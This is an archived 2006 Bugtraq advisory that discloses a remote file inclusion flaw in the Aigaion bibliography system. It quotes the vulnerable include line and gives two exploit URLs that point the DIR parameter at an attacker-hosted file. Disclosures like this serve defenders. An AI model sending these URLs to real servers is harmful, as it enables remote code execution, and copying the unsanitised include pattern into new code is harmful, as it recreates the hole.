| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20061112004524.523.qmail@securityfocus.com> Date: 12 Nov 2006 00:45:24 -0000 From: navairum@...il.com To: bugtraq@...urityfocus.com Subject: Web Interface remote file inclusion Software:Web based bibliography management system Download link: http://sourceforge.net/projects/aigaion/ script:_basicfunctions.php author: navairum ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ The script _basicfunctions.php does not specify a value for the $DIR variable before including it. Vulnerable code: //if this script is not called from within one of the base pages, redirect to frontpage require_once($DIR."checkBase.php"); /* This function leads the browser to the given location */ ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Exploit: http://site/[PATH]/_basicfunctions.php?DIR=http://site/uhoh.txt? http://site/path/pageactionauthor.php?DIR=http://site/uhoh.txt? ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ peace
Powered by blists - more mailing lists